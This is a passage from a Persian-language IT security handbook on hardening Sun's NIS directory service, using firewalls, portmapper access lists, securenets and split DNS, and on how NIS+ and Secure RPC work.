‫‪ ۱۶۰‬ﺩﺭ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ‪ Sun‬ﺍﺯ ‪ NIS‬ﻭ ﺷﺎﻳﺪ ﺑﻌﻀﻲ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﺩﻳﮕﺮ‪ ،‬ﺍﻳﻦ ﺧﻄﺮ ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﺗﻐﻴﻴـﺮ ﻣﻘـﺎﺩﻳﺮ ‪ UID‬ﻭ ‪ GID‬ﺍﻗـﻼﻡ ‪ NIS‬ﻣﻮﺟـﻮﺩ ﺩﺭ ﻓﺎﻳـﻞ‬
‫‪ passwd‬ﺑﻪ ﺻﻔﺮ‪ ،‬ﻭ ﻳﺎ ﺳﺎﻳﺮ ﻣﻘﺎﺩﻳﺮ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﻠﻲ ﺑﻪ ﻧﻮﻋﻲ ﺍﺻﻼﺡ ﺷﻮﺩ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٣٤‬‬

‫ﺑﻬﺒﻮﺩ ﺍﻣﻨﻴﺖ ‪NIS‬‬

‫ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻱ ‪ NIS‬ﺷﺎﻣﻞ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺳﻲ ﺍﺳﺖ‪ .‬ﭼﻨﺪﻳﻦ ﺭﺍﻩ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻓﺸﺎﻱ ﻏﻴﺮﻣﺠﺎﺯ ﺍﻃﻼﻋﺎﺕ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩﻫـﺎﻱ ‪NIS‬‬
‫‪١٦١‬‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻣﺜﻞ ﺑﻴﺸﺘﺮ ﺑﻬﺒﻮﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﭼﻨﺪ ﻣﻮﺭﺩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺭﺍ ﺍﺩﻏﺎﻡ ﻛﻨﻴﺪ ﺗﺎ ﻳﻚ ﺭﻭﺵ ﺩﻓـﺎﻉ ﺩﺭ ﻋﻤـﻖ ﭼﻨـﺪ ﻻﻳـﻪ‬
‫ﺑﺪﺳﺖ ﺁﻭﺭﻳﺪ‪:‬‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻳﺎ ﺣﺪﺍﻗﻞ ﻳﻚ ﻣﺴﻴﺮﻳﺎﺏ ﻫﻮﺷﻤﻨﺪ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﺪ ﻭ ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴﺪ ﺑﺴﺘﻪﻫﺎﻱ ‪ UDP‬ﻣﺮﺗﺒﻂ‬ ‫‪.١‬‬
‫ﺑﺎ ‪ RPC‬ﻣﻴﺎﻥ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﻭ ﺩﻧﻴﺎﻱ ﺑﻴﺮﻭﻧﻲ ﻣﺒﺎﺩﻟـﻪ ﺷـﻮﻧﺪ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ ﺑـﻪ ﺍﻳـﻦ ﻋﻠـﺖ ﻛـﻪ ‪ RPC‬ﺑـﺮ ﺍﺳـﺎﺱ ‪portmapper‬‬
‫ﭘﺎﻳﻪﺭﻳﺰﻱ ﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﭘﻮﺭﺕ ﻭﺍﻗﻌﻲ ‪ UDP‬ﻛﻪ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ‪ ،‬ﻳﻚ ﭘـﻮﺭﺕ ﺛﺎﺑـﺖ ﻭ ﻣـﺸﺨﺺ ﻧﻴـﺴﺖ‪ .‬ﺩﺭ ﻋﻤـﻞ‪ ،‬ﺗﻨﻬـﺎ‬
‫ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻣﻦ‪ ،‬ﺳﺪ ﻛﺮﺩﻥ ﺭﺍﻩ ﻫﻤﺔ ﺑﺴﺘﻪﻫﺎﻱ ‪ UDP‬ﺍﺳﺖ‪ ،‬ﺑﺠﺰ ﺁﻧﺪﺳﺘﻪ ﻛﻪ ﺧﻮﺩﺗﺎﻥ ﺑﺼﻮﺭﺕ ﺧﺎﺹ ﺍﺟﺎﺯﻩ ﺗﺒﺎﺩﻝ ﺁﻧﻬﺎ ﺭﺍ ﻣﻲﺩﻫﻴﺪ‪.‬‬
‫ﻧﺴﺨﻪﺍﻱ ﺍﺯ ‪ portmapper‬ﺭﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﻫﻴﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎ )ﺑـﺮ ﺍﺳـﺎﺱ ﻧـﺎﻡ ﻣﻴﺰﺑـﺎﻥ ﻳـﺎ ﺁﺩﺭﺱ ‪ (IP‬ﻛـﻪ‬ ‫‪.٢‬‬
‫ﺩﺳﺘﺮﺳﻲ ﺁﻧﻬﺎ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺧﺎﺹ ‪ RPC‬ﺑﺎﻳﺪ ﺗﺄﻳﻴﺪ ﻳﺎ ﺭﺩ ﺷﻮﺩ ﺗﻬﻴﻪ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﻧﺪﺍﺭﻳـﺪ ﻣﻬـﺎﺟﻢ ﻫﻤﭽﻨـﺎﻥ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺩﺧﺎﻟﺖ ‪ ،portmapper‬ﻭﺟﻮﺩ ﻫﺮﻳﻚ ﺍﺯ ﺧﺪﻣﺎﺕ ‪ RPC‬ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﮔﺮ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ‪ RPC‬ﺍﺑﺘـﺪﺍ‬
‫ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺑﺎ ‪ portmapper‬ﺗﻼﺵ ﻛﻨﻨﺪ‪ ،‬ﻳﻚ ﻧﺴﺨﺔ ﺑﻬﺒﻮﺩ ﻳﺎﻓﺘﺔ ‪ NIS‬ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﺯﻣﻴﻨﺔ ﻭﻗﻮﻉ ﻳـﻚ ﺣﻤﻠـﺔ ﺑـﺎﻟﻘﻮﻩ‬
‫ﻫﺸﺪﺍﺭ ﺩﻫﺪ‪.‬‬
‫ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ‪ NIS‬ﺷﻤﺎ ﺍﺯ ﻓﺎﻳﻞ ‪ /var/yp/securenets‬ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﻳﺎ ﻧﻪ‪ .‬ﺍﮔﺮ ﺍﻳـﻦ ﻓﺎﻳـﻞ‬ ‫‪.٣‬‬
‫ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻣﻲﺗﻮﺍﻧﺪ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺷﺒﻜﻪﻫﺎﻳﻲ ﻛﻪ ﻗﺎﺑﻠﻴﺖ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ ‪ NIS‬ﺭﺍ ﺩﺍﺭﻧﺪ ﻣﺸﺨﺺ ﻛﻨﺪ‪ .‬ﻧﮕﺎﺭﺷـﻬﺎﻱ ﺩﻳﮕـﺮ‬
‫ﻻ ﺑﺮﺍﻱ ﻏﺮﺑﺎﻝ ﻛﺮﺩﻥ ﺁﺩﺭﺳﻬﺎﻳﻲ ﻛﻪ ﺩﺳﺘﺮﺳﻲ ﺁﻧﻬﺎ ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺧـﺎﺹ ‪ RPC‬ﺗﻮﺳـﻂ ‪ ypserve‬ﻣﺠـﺎﺯ‬ ‫‪ NIS‬ﺍﺣﺘﻤﺎ ﹰ‬
‫ﺍﺳﺖ‪ ،‬ﺭﻭﺷﻬﺎﻱ ﺩﻳﮕﺮﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﺁﻧﻘﺪﺭ ﺍﺯ ‪ NIS‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ ﻛﻪ ‪ DNS‬ﺍﺯ ﻳﺎﺩﺗﺎﻥ ﺑﺮﻭﺩ! ﺍﮔﺮ ﺑﻨﺎﻱ ﺷﻤﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻛـﺴﻲ ﺍﺯ ﺑﻴـﺮﻭﻥ ﻧﺘﻮﺍﻧـﺪ ﺁﺩﺭﺳـﻬﺎﻱ ‪ IP‬ﺍﺩﺍﺭﺓ‬ ‫‪.٤‬‬
‫ﺷﻤﺎ ﺭﺍ ﺑﻔﻬﻤﺪ‪ ،‬ﺩﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ‪ ١٦٢‬ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ ‪ -‬ﻳﻜﻲ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺍﺧﻠﻲ ﻭ ﺩﻳﮕﺮﻱ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺧﺎﺭﺟﻲ‪.‬‬

‫‪ NIS+‬ﺷﺮﻛﺖ ‪Sun‬‬

‫‪ NIS‬ﺑﺮﺍﻱ ﻣﺤﻴﻄﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﻭﺳﺘﺎﻧﻪ ﻭ ﻛﻮﭼﻚ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑـﻮﺩ‪ .‬ﻭﻗﺘـﻲ ﻣـﺸﺘﺮﻳﺎﻥ ﺷـﺮﻛﺖ ‪ Sun Microsystems‬ﺷـﺮﻭﻉ ﺑـﻪ‬
‫ﺳﺎﺧﺖ ﺷﺒﻜﻪﻫﺎﻳﻲ ﺑﺎ ﻫﺰﺍﺭﺍﻥ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺮﺩﻧﺪ‪ ،‬ﻣﻌﻠﻮﻡ ﺷﺪ ‪ NIS‬ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺷﺮﻛﺘﻬﺎﻱ ﺑـﺰﺭﮒ ﻏﻴﺮﻛـﺎﺭﺑﺮﺩﻱ ﻭ ﻧـﺎﺍﻣﻦ ﺍﺳـﺖ‪ .‬ﺩﺭ‬
‫ﺳﺎﻝ ‪ ۱۹۹۰‬ﺷﺮﻛﺖ ‪ Sun Microsystems‬ﺗﻬﻴﺔ ﻳﻚ ‪ NIS‬ﺟﺎﻳﮕﺰﻳﻦ ﺭﺍ ﺷﺮﻭﻉ ﻛﺮﺩ ﻭ ﭼﻨﺪ ﺳـﺎﻝ ﺑﻌـﺪ ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ ﺗﺤـﺖ ﻋﻨـﻮﺍﻥ‬
‫‪ NIS+‬ﻋﺮﺿﻪ ﺷﺪ‪.‬‬
‫‪ NIS+‬ﺑﺴﺮﻋﺖ ﺑﻪ ﺧﺮﺍﺏ ﺑﻮﺩﻥ ﺷﻬﺮﺕ ﻳﺎﻓﺖ ﻭ ﺑﻨﻈﺮ ﻣﻲﺭﺳﻴﺪ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﻪ ﺁﻥ ﻋﻤ ﹰ‬
‫ﻼ ﻣﻮﺭﺩ ﺁﺯﻣﻮﻥ ﻗﺮﺍﺭ ﻧﮕﺮﻓﺘـﻪ ﺑﻮﺩﻧـﺪ‪ ،‬ﭼﺮﺍﻛـﻪ ﺑـﻪ‬
‫ﻧﺪﺭﺕ ﻃﺒﻖ ﺁﻧﭽﻪ ﻛﻪ ﻗﺮﺍﺭ ﺑﻮﺩ ﻋﻤﻞ ﻣﻲﻛﺮﺩﻧﺪ‪ .‬ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ‪ ،‬ﺳﻨﺪﺑﺮﺩﺍﺭﻱ ﺁﻥ ﺑﺴﻴﺎﺭ ﮔﻴﺞﻛﻨﻨﺪﻩ ﻭ ﻧﺎﻗﺺ ﺑـﻮﺩ‪ .‬ﺩﺭ ﻧﻬﺎﻳـﺖ ‪ Sun‬ﻧﻘـﺎﻳﺺ‬
‫ﺁﻧﺮﺍ ﺭﻓﻊ ﻛﺮﺩ ﺑﻄﻮﺭﻳﻜﻪ ﺍﻣﺮﻭﺯ ‪ NIS+‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻗﺎﺑﻞ ﺍﻃﻤﻴﻨﺎﻥﺗﺮ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﻭ ﻛﻨﺘﺮﻝ ﺍﻳﻤﻦ ﺷﺒﻜﻪ ﺍﺳﺖ‪ .‬ﻳﻚ ﻣﺮﺟـﻊ ﻋـﺎﻟﻲ ﺑـﺮﺍﻱ‬
‫ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺯ ‪ NIS+‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻛﺘﺎﺏ ﻫﻤﻪ ﭼﻴﺰ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻫﺒﺮﻱ ‪ ١٦٣NIS+‬ﻧﻮﺷﺘﻪ ﺭﻳﻚ ﺭﻣﺰﻱ‪ ١٦٤‬ﺍﺳﺖ‪.‬‬

‫‪161‬‬ ‫‪Layered Defense-in-Depth‬‬


‫‪162‬‬ ‫‪Nameserver‬‬
‫‪163‬‬ ‫)‪All About Administrating NIS+ (SunSoft Press, Prentice Hall, 1994‬‬
‫‪164‬‬ ‫‪Rick Ramsey‬‬
‫‪٣٣٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻛﺎﺭﻱ ﻛﻪ ‪ NIS+‬ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ‬


‫‪ NIS+‬ﺩﺭ ﺷﺒﻜﻪ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻳﻲ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺳـﺎﺯﻣﺎﻥ ﺑﻜـﺎﺭ ﻣـﻲﺭﻭﺩ‪ NIS+ .‬ﺍﻳـﻦ‬
‫ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎ ﺭﺍ "ﺟﺪﻭﻝ" ﻣﻲﻧﺎﻣﺪ‪ .‬ﺍﻳﻦ ﺟﺪﻭﻟﻬﺎ ﺍﺯ ﻧﻈﺮ ﻋﻤﻠﻜﺮﺩ ﻣﺸﺎﺑﻪ ﻧﮕﺎﺷﺘﻬﺎﻱ ‪ NIS‬ﻫﺴﺘﻨﺪ‪ .‬ﺑﺮ ﺧﻼﻑ ‪ NIS+ ،NIS‬ﺍﺯ ﻃﺮﻳﻖ ﺷـﺒﻜﻪ‬
‫ﺍﻣﻜﺎﻥ ﺍﺻﻼﺡ ﺍﻓﺰﺍﻳﺸﻲ‪ ١٦٥‬ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ‪.‬‬
‫ﻫﺮ ﺩﺍﻣﻨﺔ ‪ NIS+‬ﺩﻗﻴﻘﹰﺎ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ‪ ١٦٦NIS+‬ﺩﺍﺭﺩ‪ .‬ﺍﻳﻦ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ ﻛﻪ ﺣﺎﻭﻱ ﻧﺴﺨﺔ ﺍﺻﻠﻲ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ‬
‫ﺩﺍﻣﻨﺔ ﺍﺻﻠﻲ ‪ ١٦٧NIS+‬ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻜﺜﻴﺮ ﺷﻮﺩ‪ ،‬ﻛـﻪ ﺍﻳﻨﻜـﺎﺭ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﺣﺘـﻲ‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ﺧﺎﻣﻮﺵ ﺍﺳﺖ ﻳـﺎ ﺩﺭ ﺩﺳـﺘﺮﺱ ﻧﻴـﺴﺖ ﺷـﺒﻜﻪ ﻫﻤﭽﻨـﺎﻥ ﻗﺎﺑـﻞ ﺍﺳـﺘﻔﺎﺩﻩ ﺑﻤﺎﻧـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗـﻮﺍﻥ ﺍﺯ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS+‬ﺑﺮﺍﻱ ﺯﻳﺮﺩﺍﻣﻨﻪﻫﺎ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫ﻣﻮﺟﻮﺩﻳﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ NIS+‬ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ ﻣﻮﻛﻼﻥ ‪ ١٦٨NIS+‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻳﻚ ﻣﻮﻛـﻞ ‪ NIS+‬ﻣـﻲﺗﻮﺍﻧـﺪ ﻳـﻚ‬
‫ﻣﻴﺰﺑﺎﻥ ﻭ ﻳﺎ ﻳﻚ ﻛﺎﺭﺑﺮ ﺗﺄﻳﻴﺪ ﺍﻋﺘﺒﺎﺭ ﺷﺪﻩ ﺑﺎﺷﺪ‪ .‬ﻫﺮ ﻣﻮﻛﻞ ‪ NIS+‬ﻳﻚ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻭ ﻳﻚ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺩﺍﺭﺩ ﻛﻪ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ‬
‫‪ NIS+‬ﺩﺭ ﺩﺍﻣﻨﻪ ﺫﺧﻴﺮﻩ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﻛﻠﻴﺔ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﻴﺎﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻭ ﻣﻮﻛﻼﻥ ‪ NIS+‬ﺍﺯ ﻃﺮﻳﻖ "‪ - "Secure RPC‬ﻧﺴﺨﻪﺍﻱ ﺍﺯ ‪ RPC‬ﻛﻪ ﻓﺮﺍﺧﻮﺍﻧﻴﻬﺎﻱ ﺗﻮﺍﺑـﻊ ﺭﺍ‬
‫ﺍﺯ ﻃﺮﻳﻖ ﺭﻣﺰﮔﺬﺍﺭﻱ ‪ DES‬ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻭ ﻣﺤﺎﻓﻈﺖ ﻣﻲﻛﻨﺪ ‪ -‬ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻨﻜﺎﺭ‪ ،‬ﺍﺭﺗﺒﺎﻃﺎﺕ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﺍﺳـﺘﺮﺍﻕ ﺳـﻤﻊ ﻭ‬
‫ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﻣﻘﺎﻭﻡ ﻣﻲﺳﺎﺯﺩ‪ NIS+ .‬ﻫﻤﭽﻨﻴﻦ ﺑﺮ ﺳﺎﺧﺖ ﻭ ﻣﺪﻳﺮﻳﺖ ﻛﻠﻴﺪﻫﺎﻱ ‪ Secure RPC‬ﻧﻈﺎﺭﺕ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ‪،NIS+‬‬
‫ﻫﺮﻳﻚ ﺍﺯ ﺍﻋﻀﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻗﺎﺩﺭ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺍﺯ ‪ Secure RPC‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪.‬‬

‫ﺟﺪﻭﻟﻬﺎﻱ ‪ NIS+‬ﻭ ﺳﺎﻳﺮ ﻧﻜﺎﺕ ﻣﺮﺑﻮﻃﻪ‬


‫ﻛﻠﻴﺔ ﺍﻃﻼﻋﺎﺕ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ NIS+‬ﺩﺭ ﻗﺎﻟﺐ ﺍﺷﻴﺎ‪ ١٦٩‬ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ‪ NIS+ .‬ﺳﻪ ﮔﻮﻧﺔ ﺍﺳﺎﺳﻲ ﺍﺷـﻴﺎ ﺭﺍ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﻣﻲﻛﻨﺪ‪" .‬ﺟﺪﻭﻟﻬﺎ" ﺍﻃﻼﻋﺎﺕ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺭﺍ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻨﺪ‪" ،‬ﮔﺮﻭﻫﻬﺎ" ﺑﻪ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻣﻮﻛﻼﻥ ‪ NIS+‬ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﺑـﺮﺍﻱ ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ﺁﻧﻬﺎ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪ ،‬ﻭ "ﺩﺍﻳﺮﻛﺘﻮﺭﻱﻫﺎ" ﻇﺮﻓﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺟﺪﻭﻟﻬﺎ‪ ،‬ﮔﺮﻭﻫﻬﺎ‪ ،‬ﻭ ﺳﺎﻳﺮ ﺩﺍﻳﺮﻛﺘﻮﺭﻱﻫﺎﻱ ﻫـﺴﺘﻨﺪ‪ ،‬ﻭ ﻳـﻚ ﺳـﺎﺧﺘﺎﺭ ﺩﺭﺧﺘـﻲ‬
‫ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ NIS+‬ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ‪.‬‬
‫‪ ۱۶ ،NIS+‬ﺟﺪﻭﻝ ﺭﺍ ﺍﺯ ﭘﻴﺶ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﺪ‪ ،‬ﺷﺎﻣﻞ ﺟﺪﻭﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﻣﻴﺰﺑﺎﻧﻬﺎ ﻭ ﺷﺒﻜﻪﻫﺎ‪ ،‬ﭘﺮﻭﺗﻜﻠﻬـﺎ ﻭ ﺧـﺪﻣﺎﺕ‪ ،‬ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻭ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪ ،‬ﮔﺮﻭﻩﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﮔﺮﻭﻩﻫﺎﻱ ﺷﺒﻜﻪ‪ ،‬ﭘﺴﺘﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭼﻨﺪﮔﺎﻧﻪ ﻭ ﺳﺎﻳﺮ ﻣـﻮﺍﺭﺩ‪ .‬ﻛـﺎﺭﺑﺮﺍﻥ ﺩﺳﺘـﺸﺎﻥ ﺑـﺮﺍﻱ ﺳـﺎﺧﺘﻦ‬
‫ﺟﺪﻭﻟﻬﺎﻱ ﺍﺿﺎﻓﻪ ﺑﺮﺍﻱ ﺧﻮﺩﺷﺎﻥ ﺑﺎﺯ ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪NIS+‬‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ NIS+‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﺭﺿﺎﻳﺘﺒﺨﺶ ﺑﺎﺷﺪ‪ .‬ﻭﻗﺘﻲ ﻳﻚ ﻛﺎﺭﺑﺮ ﻭﺍﺭﺩ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻣﻲﺷﻮﺩ‪ ،‬ﺑﺮﻧﺎﻣﺔ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﺼﻮﺭﺕ‬
‫ﺧﻮﺩﻛﺎﺭ ﺍﺳﺘﻮﺍﺭﻧﺎﻣﺔ ﺍﻣﻨﻴﺘﻲ ‪ NIS+‬ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻛﺮﺩﻩ‪ ،‬ﺗﻼﺵ ﻣﻲﻛﻨﺪ ﺁﻥ ﺭﺍ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﻭﺍﺭﺩﺷﺪﻩ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ‪ NIS+‬ﻳﻜﺴﺎﻥ ﺑﺎﺷﻨﺪ )ﻛﻪ ﻣﻌﻤﻮ ﹰﻻ ﭼﻨﻴﻦ ﺍﺳﺖ( ﺭﻭﻧﺪ ‪ keyserv‬ﻣﺮﺑﻮﻁ ﺑـﻪ ‪ NIS+‬ﻛﻠﻴـﺪ‬
‫ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮ ﺭﺍ ﺩﺭ ﺣﺎﻓﻈﻪ ﻧﮕﻪ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻛﺎﺭﺑﺮ ﺑﻪ ﻫﻤﺔ ﺧﺪﻣﺎﺕ ‪ Secure RPC‬ﺩﺳﺘﺮﺳﻲ ﺷﺒﻪ ﻣﺴﺘﻘﻴﻢ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ‬
